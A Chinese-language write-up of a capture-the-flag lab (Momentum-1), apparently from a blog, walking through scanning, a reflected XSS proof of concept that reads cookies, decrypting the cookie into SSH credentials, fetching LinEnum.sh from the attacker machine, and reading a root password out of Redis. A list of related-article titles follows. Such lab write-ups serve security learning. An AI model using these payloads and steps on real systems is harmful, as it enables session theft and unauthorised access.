记录靶场练习

文章目录

目录

一、主机发现

二、漏洞发现

三、漏洞利用

四、权限提升

总结


一、主机发现

首先按照惯例,利用nmap进行主机发现,顺便将开放端口也扫描出来。扫描自己主机所在的网段。

nmap 192.168.216.0/24

可以看到IP地址和开放了22和80端口,接下来对服务器信息进行详细的扫描

nmap -A -v -T4 192.168.216.143

网站是使用Apache中间件搭建的,服务器是Debian

二、漏洞发现

访问80端口,看起来并没有特别的地方,只是一个图片展示的网站。


接下来对这个网站进行目录结构扫描,看看是否能扫出有用的文件

依次访问查看是否能够得到有用的信息,访问后img目录和css目录页都是正常的,但是在查看js目录后,发现了一段代码,不知道什么意思。

于是网上查找,就是在url后加上这一段就会跳转到另一个页面,试着尝试访问了一下。

发现无论在id下输入什么字符,都会显示出来,怀疑有xss漏洞,接着上poc

http://192.168.216.143/opus-details.php?id=%3Cscript%3Ealert(%221%22)%3C/script%3E

nice!果然存在漏洞。

三、漏洞利用

利用该漏洞尝试获取cookie信息

id=<script>alert(document.cookie)</script>

很明显这是一个加密后的值,具体是什么加密还不清楚。到这里发现

在这里有我们之前忽略掉的一段代码,可能是利用了“SecretPassphraseMomentum”对cookie信息进行了AES解密,在网上寻找在线解密网站解密后为“auxerre-alienum##”,而且想到服务器还开启了22端口,所以猜想这是一个账号和密码的组合

尝试了几个组合后,才登录了进去

auxerre alienum
alienum auxerre
auxerre alienum##
alienum## auxerre
auxerre auxerre-alienum
alienum auxerre-alienum
正确:auxerre auxerre-alienum##

附上参考网站:AES加密-AES解密-在线AES加密解密工具 (jsons.cn)

其实完全可以编写一个脚本进行测试,这样就不用一个个的去尝试,效率更高。

使用kali连接到服务器

ssh auxerre@192.168.216.143

第一个flag拿到

后续还需进行提权操作。

四、权限提升

在攻击机搭建一个http服务

python3 -m http.server 8001

在靶机下载LinEnum.sh

wget http://192.168.216.128:8001/LinEnum.sh

bash运行脚本收集系统信息保存到1.txt文件

有一个6379端口被监听,而且6379是Redis的默认端口,查看端口占用信息

Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空;如果 Redis 以 root 身份运行,黑客可往服务器上写入 SSH 公钥文件,直接登录服务器。

所以连接上数据库尝试提权

查看redis服务下的键,发现有“rootpass”,怀疑是root密码,而且联系上上面“auxerre-alienum##”的关系,猜测"m0mentum-al1enum##"就是root的密码。

成功提权到root,拿到最后一个flag!

撒花!!!

总结

XSS漏洞

AES加密

枚举

LinEnum脚本收集服务器信息

Redis服务6379端口,查看所有key--keys *

记录一次vuln靶场的渗透过程---Momentum-1相关推荐

  1. 记录一次vuln靶场的渗透过程---driftingblues9

    记录一次渗透的过程 目录 一.信息收集 二.发现漏洞 三.权限提升 总结 一.信息收集 1.使用nmap扫描网段,发现存活主机,以及开放的端口 nmap -v 192.168.216.0/24 192 ...

  2. 全!CTF靶场、渗透实战靶场总结 (适合收藏)

    CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...

  3. 记某hw中遇到的cms(PageAdmin CMS)渗透过程

    0x00前言 这是上周hw中遇到的一个cms,记录一下,防止以后遇到忘记利用点(手动狗头) 0x01介绍 PageAdmin Cms是一款基于asp.net mvc开发的自助建站系统,于2008年发布 ...

  4. kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结

    渗透过程中可能要用到的Kali工具小总结 写在最前面 最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的 所以写一个渗透过程中可能用到的kali渗透工具的小小总结 写的不对 多多包涵 各 ...

  5. 语言都是相通的,学好一门语言,再学第二门语言就很简单,记录一下我复习c语言的过程。...

    语言都是相通的,学好一门语言,再学第二门语言就很简单,记录一下我复习c语言的过程. 为了将本人的python培训提高一个层次,本人最近买了很多算法的书. 这个书上的代码基本都是c语言实现的,c语言很久 ...

  6. oracle 9i 手工建库,简单记录Oracle 9i数据库手工建库过程

    简单记录Oracle 9i数据库手工建库过程Oracle 9i手工建库 By Oracle老菜 今天客户要用oracle 9.2.0.5,aix 6.1已经不支持了,只好从别的数据库把软件拷贝过来重编 ...

  7. php网站渗透实战_【案例分析】记一次综合靶场实战渗透

    原标题:[案例分析]记一次综合靶场实战渗透 时间有点久,这里主要和大家分享一下思路. 该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网. 开始渗透 首先进入靶场开放的唯一一个 ...

  8. 记录第一次使用nvidia tao训练模型的过程

    记录第一次使用nvidia tao训练模型的过程 搭建NVIDIA TAO环境 编辑~/.tao_mounts.json,将自己的项目目录映射到docker中的目录 Nvidia TAO是NVIDIA ...

  9. 渗透过程中日志信息分析示例

    渗透过程中,我们可能用普通账号进到了系统,在提权或者进一步信息收集的过程中,我们会获得一些日志文件,根据这些日志文件我们需要进一步的分析. 下面是kali官方给的日志文件,根据这个日志,讲述一下信息收 ...

最新文章

  1. Greenplum 2000亿 近似度查询 性能 以及注意事项
  2. 矩阵在计算机程序中的应用
  3. (转)TinyXML Tutorial 中文指南
  4. C++字符串操作函数
  5. STM32、Cortex-M3和ARMv8-M之间的关联
  6. 使用Azure Blob存储托管Maven工件
  7. 真服了!java翻译器软件下载手机版
  8. 【图文+代码】不客气的说,这可能是你距离深入理解Java接口最近的一次
  9. 【总结】Unity游戏优化
  10. OpenCV-图像处理(23、直方图均衡化)
  11. 上海理工大学HVAC综合实验室(图)
  12. ACM入门-最小生成树及其应用
  13. 使用跨端解决方案Rax编写鸿蒙应用
  14. 线性MMSE检波和ZF检波
  15. python编写poc_POC编写基础知识
  16. python圆形螺旋线_Python Turtle绘制漂亮彩色螺旋线及一闪而过的解决
  17. 第十五周项目二----用哈希法组织关键字之链地址法
  18. 蓝牙耳机哪个品牌经济实惠?价格便宜音质好的蓝牙耳机推荐
  19. 中国跨境平台出海,产业带依然是最大优势
  20. html设置自动切图指定位置,HTML5自助切图

热门文章

  1. AI公司都是泡沫?竹间智能说今年能实现收支平衡 | 行业
  2. 职场人士都在用的15款办公软件,有你用过的吗?
  3. Microsoft AppLocale 实用程序
  4. 跳出内循环,继续下一次外循环的写法
  5. 【咆哮体程序员版】搞计算机当程序猿的人你伤不起!伤不起啊!!!
  6. ssm毕设项目图书推荐系统93gei(java+VUE+Mybatis+Maven+Mysql+sprnig)
  7. 零跑汽车势头强劲,零跑汽车股价有望继续领跑
  8. EOS项目编译及操作入门
  9. WordPressTOB0.9主题下载
  10. 【HTML】表格的跨行跨列